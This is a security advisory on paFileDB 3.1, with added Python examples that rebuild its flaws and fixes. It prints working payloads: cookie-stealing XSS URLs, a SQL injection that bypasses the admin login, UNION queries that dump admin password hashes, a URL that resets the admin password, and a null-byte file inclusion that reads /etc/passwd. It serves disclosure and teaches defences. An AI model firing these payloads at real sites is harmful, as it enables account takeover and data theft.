paFiledb31vuln.txt

paFileDB 3.1 Multiple Vulnerabilities
Reported 21 Jun 2005 by James Bercegay (source: packetstormsecurity.com)

##########################################################  
# GulfTech Security Research June 14th, 2005  
##########################################################  
# Vendor : php Arena  
# URL : http://www.phparena.net/pafiledb.php  
# Version : paFileDB 3.1 && Earlier  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
  
Description:  
paFileDB is a popular open source web application offered by  
php Arena. paFileDB allows webmasters to open up an interactive  
file repository on their website. There are a number of  
vulnerabilities in paFileDB that may allow an attacker to  
include arbitrary local files, retrieve sensitive user and/or  
database information, and completely bypass admin and team  
member authentication. Users should upgrade immediately.  
  
  
  
Cross Site Scripting:  
There are a number of cross site scripting issues in the paFileDB  
software. The majority of them stem from variables that are  
concatenated into the page without ever being initialized, so a  
request parameter of the same name is rendered unescaped.  
  
http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22  
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3C  
script%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E  
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
These vulnerabilities can be used to render hostile code in the  
context of the victims browser, and in turn disclose sensitive  
information to an attacker.  
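The three URLs above all work the same way: a request parameter that the script never initializes is concatenated into a link or form attribute unescaped. The following is an added example in Python (not paFileDB's code) that models the viewall "sort by" link, with the vulnerable concatenation beside a fixed version that allow-lists the sort key, URL-encodes the query string and HTML-escapes the attribute. The set of sort keys and the link text are assumptions.

```python
"""Model of an unescaped, never-initialised variable landing in an href.
Added example, not paFileDB's own code."""
import html
from urllib.parse import urlencode

ALLOWED_SORT = ("name", "date", "downloads")   # assumed set of sort keys

# The advisory's payload: closes the attribute and the tag, then injects script.
PAYLOAD = '"><script>alert(document.cookie)</script>'


def sort_link_vulnerable(request):
    """Emulates the bug: every request key becomes a variable (register_globals
    or extract()), and $sortby / $start go straight into the href."""
    sortby = request.get("sortby", "")
    start = request.get("start", "0")
    return f'<a href="pafiledb.php?action=viewall&start={start}&sortby={sortby}">Next</a>'


def sort_link_fixed(request):
    """Allow-list the sort key, coerce start to an integer, URL-encode the
    query string, then HTML-escape it for the attribute (quote=True also
    escapes the double quote the payload relies on)."""
    sortby = request.get("sortby", "name")
    if sortby not in ALLOWED_SORT:
        sortby = "name"
    try:
        start = max(0, int(request.get("start", "0")))
    except ValueError:
        start = 0
    qs = urlencode({"action": "viewall", "start": start, "sortby": sortby})
    return f'<a href="pafiledb.php?{html.escape(qs, quote=True)}">Next</a>'


if __name__ == "__main__":
    attack = {"start": "20", "sortby": PAYLOAD}
    print("vulnerable:", sort_link_vulnerable(attack))
    print("fixed:     ", sort_link_fixed(attack))
```

Escaping alone would already neutralise the payload; the allow-list is there because a sort key is also about to be interpolated into an ORDER BY, so it should never be free text in the first place.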
  
  
  
SQL Injection:  
There are a number of SQL Injection vulnerabilities in paFileDB, but it  
should be noted that to exploit most of them magic_quotes_gpc must be  
off (the one exception is covered at the end of this section). Since  
magic_quotes_gpc appears to be off in the default php.ini settings now,  
I consider these issues fairly high risk. The most serious of the SQL  
Injection issues lies in the administrative login.  
  
if ($login == "do")  
{  
    // $formname is interpolated straight into the query  
    $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$formname'", 1);  
    $formpw = md5($formpass);  
    // compared against whatever row the query returned, including a UNION row  
    if ($formpw == $admin[admin_password])  
    {  
        $adminip = getenv ("REMOTE_ADDR");  
        $ip = md5($adminip);  
        $user = $formname;  
        $pass = $formpw;  
  
        if ($authmethod == "cookies")  
        {  
            $cookiedata = "$ip|$formname|$formpw";  
            setcookie("pafiledbcookie", $cookiedata);  
        }  
  
        header("Location: admin.php");  
    }  
}  
  
  
The variable $formname is taken directly from the submitted login form and  
interpolated into the query, so if magic_quotes_gpc is off an attacker can  
use a UNION SELECT to bypass admin authentication!  
  
http://pafiledb/pafiledb.php?action=admin&login=do&formname=-99'%20UNION  
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',  
%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=  
%3E%3E+Log+In+%3C%3C&action=admin&login=do  
  
The query above uses a UNION SELECT to return the admin id, username, email  
etc., but supplies the password hash column ourselves as the md5 hash of the  
$formpass variable (6f1ed002ab5595859014ebf0951522d9 is md5("blah"), matching  
formpass=blah), so the md5($formpass) comparison succeeds. This same issue  
applies to the team login, and also to the auth.php scripts in the /teams/  
and /admin/ directories.  
  
There is also an SQL Injection vulnerability that will allow team members  
to obtain the administrative password hash and escalate their privileges  
to admin.  
  
http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,  
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+  
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F  
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit  
  
http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,  
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%  
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1  
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit  
  
Last but not least there is a SQL Injection vulnerability in search.php  
because the $string variable is never sanitized.  
  
There is one SQL Injection issue in paFileDB that does not require  
magic_quotes_gpc to be disabled. This particular issue lets a team member  
run any SQL statement they like, including making themselves an admin.  
  
http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%29%20WHERE%201/*  
  
The above URL sets the admin password to 1337 if run by a logged in team  
member or admin. This vulnerability exists because $query is never  
initialised before the script appends to it; since every request variable  
is imported into the global scope, an attacker-supplied query parameter  
becomes the start of the statement, and the trailing /* comments out  
whatever the script appends after it. The payload contains no quote  
characters, which is why magic_quotes_gpc offers no protection here.  
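Both SQL injection paths, the admin-login UNION bypass and the $query hijack just described, modelled end to end in Python on SQLite as an added example. This is not paFileDB's code: the table layouts, the text of the files UPDATE the handler appends, and the admin password "correct horse" are assumptions, and MySQL's MD5() is registered by hand because SQLite has no such function.

```python
"""Model of the two SQL-injection paths in paFileDB 3.1 rebuilt on SQLite.
Added example: not paFileDB's code, and the table layouts are assumed."""
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the admin and files tables. The admin table has
    five columns because the advisory's UNION payload supplies five values."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    # MySQL has MD5(); SQLite does not, so register one for the UPDATE payload.
    conn.create_function("MD5", 1, lambda v: hashlib.md5(str(v).encode()).hexdigest())
    conn.execute("""CREATE TABLE pafiledb_admin (
        admin_id INTEGER PRIMARY KEY, admin_username TEXT, admin_password TEXT,
        admin_email TEXT, admin_level INTEGER)""")
    conn.execute("CREATE TABLE pafiledb_files (file_id INTEGER PRIMARY KEY, file_name TEXT)")
    conn.execute("INSERT INTO pafiledb_admin VALUES (1, 'admin', ?, 'admin@example.invalid', 1)",
                 (hashlib.md5(b"correct horse").hexdigest(),))
    conn.execute("INSERT INTO pafiledb_files VALUES (1, 'readme.txt')")
    conn.commit()
    return conn


def admin_login_vulnerable(conn, formname, formpass):
    """Same logic as includes/admin/login.php: $formname is interpolated, then
    md5($formpass) is compared with whatever row the query returned."""
    sql = f"SELECT * FROM pafiledb_admin WHERE admin_username = '{formname}'"
    admin = conn.execute(sql).fetchone()
    return admin is not None and hashlib.md5(formpass.encode()).hexdigest() == admin["admin_password"]


def admin_login_fixed(conn, formname, formpass):
    """Bound parameter: the username can no longer change the statement."""
    admin = conn.execute("SELECT * FROM pafiledb_admin WHERE admin_username = ?",
                         (formname,)).fetchone()
    return admin is not None and hashlib.md5(formpass.encode()).hexdigest() == admin["admin_password"]


def union_bypass_formname(formpass):
    """The advisory's formname payload: no row matches '-99', so the only row
    returned is the UNION row, whose admin_password column is md5(formpass)."""
    h = hashlib.md5(formpass.encode()).hexdigest()
    return ("-99' UNION SELECT admin_id, admin_username, '" + h +
            "', admin_email, 1 FROM pafiledb_admin WHERE '1")


def team_file_edit(conn, request, initialise_query):
    """Model of the team file-edit handler (the real UPDATE text is not in the
    advisory; the one here is a stand-in). paFileDB imports every GPC value
    into a global, so when the script appends to $query without first setting
    $query = "", the statement starts with whatever ?query= the client sent."""
    php_globals = dict(request)               # register_globals-style import
    if initialise_query:
        php_globals["query"] = ""             # the missing initialisation
    else:
        php_globals.setdefault("query", "")   # an undefined $query concatenates as ""
    php_globals["query"] += ("UPDATE pafiledb_files SET file_name = '"
                             + request["name"] + "' WHERE file_id = " + str(int(request["id"])))
    conn.execute(php_globals["query"])
    conn.commit()
    return php_globals["query"]


# Payload from the advisory: it contains no quote characters, so magic_quotes_gpc
# leaves it alone, and the trailing /* swallows the script's own UPDATE fragment.
QUERY_HIJACK = "UPDATE pafiledb_admin SET admin_password = MD5(1337) WHERE 1/*"


if __name__ == "__main__":
    conn = make_db()
    print("UNION bypass, vulnerable:", admin_login_vulnerable(conn, union_bypass_formname("blah"), "blah"))
    print("UNION bypass, fixed:     ", admin_login_fixed(conn, union_bypass_formname("blah"), "blah"))
    team_file_edit(conn, {"id": "1", "name": "readme.txt", "query": QUERY_HIJACK}, initialise_query=False)
    print("admin password now 1337: ", admin_login_fixed(conn, "admin", "1337"))
```

Running the file directly prints the three outcomes. The UNION bypass works because the login never checks that the row came from the table rather than from the attacker's UNION; the hijack works because an uninitialised variable plus request-to-global import lets the client choose the first half of a statement and comment out the second. A bound parameter fixes the first, and `$query = ""` before the loop (plus not importing request data into globals at all) fixes the second.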
  
  
  
Local File Include Vulnerability:  
paFileDB is vulnerable to a local file inclusion vulnerability that may  
allow an attacker to execute arbitrary local scripts, or to read/access  
arbitrary files on the webserver. Let's look at pafiledb.php  
  
if ($login == "do") { include "./includes/$action/login.php"; exit; }  
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }  
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }  
  
The $action variable is never sanitized and is vulnerable to directory  
traversal sequences. The trailing %00 matters: PHP of that era handed the  
path to the C library unchecked, so the NUL byte terminated it and the  
"/login.php" suffix was dropped.  
  
http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do  
  
This vulnerability exists on all paFileDB configurations regardless of  
register_globals, as the application itself extracts all GPC values into  
global variables.  
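A hardened replacement for the include "./includes/$action/login.php" line, as an added example in Python (not paFileDB's code; the includes layout and the set of login modules are assumptions). It layers three checks, any one of which defeats the traversal plus null byte payload above, and builds a throwaway directory tree so the check can be exercised offline.

```python
"""Hardened resolution of ?action=...&login=do to a file under includes/.
Added example in Python, not paFileDB's code; the layout is assumed."""
import os
import re
import tempfile

INCLUDES = "includes"
# The only login handlers the application has, so allow-list them outright.
LOGIN_MODULES = ("admin", "team")


def resolve_login_include(base_dir, action):
    """Return the file to include for ?action=...&login=do, or raise ValueError.

    Defence in depth; each check alone stops ../../../../etc/passwd%00:
    1. a NUL byte is never legitimate in a path (PHP before 5.3.4 passed it
       to the C library, which truncated the path and dropped /login.php);
    2. only a bare lower-case directory name from the allow-list is accepted,
       so no separators, dots or traversal sequences survive;
    3. the resolved path must still lie under base_dir/includes.
    """
    if "\x00" in action:
        raise ValueError("NUL byte in action")
    if not re.fullmatch(r"[a-z]+", action) or action not in LOGIN_MODULES:
        raise ValueError(f"unknown action {action!r}")
    root = os.path.realpath(os.path.join(base_dir, INCLUDES))
    target = os.path.realpath(os.path.join(root, action, "login.php"))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes the includes directory")
    return target


def accepts(base_dir, action):
    """True if resolve_login_include would include a file for this action."""
    try:
        resolve_login_include(base_dir, action)
        return True
    except ValueError:
        return False


def make_fixture():
    """Constructed on-disk layout to exercise the check (not real paFileDB files)."""
    base = tempfile.mkdtemp()
    for module in LOGIN_MODULES:
        d = os.path.join(base, INCLUDES, module)
        os.makedirs(d)
        with open(os.path.join(d, "login.php"), "w") as fh:
            fh.write("<?php // stand-in ?>\n")
    return base


if __name__ == "__main__":
    base = make_fixture()
    for candidate in ("admin", "team", "../../../../etc/passwd\x00", "admin/../team", "ADMIN"):
        print(repr(candidate), "->", accepts(base, candidate))
```

The allow-list makes the regex and the realpath check redundant, which is the point: if the module list is later replaced by a directory scan, the path containment check still holds.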
  
  
  
Solution:  
A new version of paFileDB has been released, so upgrading is advised.  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00082-06142005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
  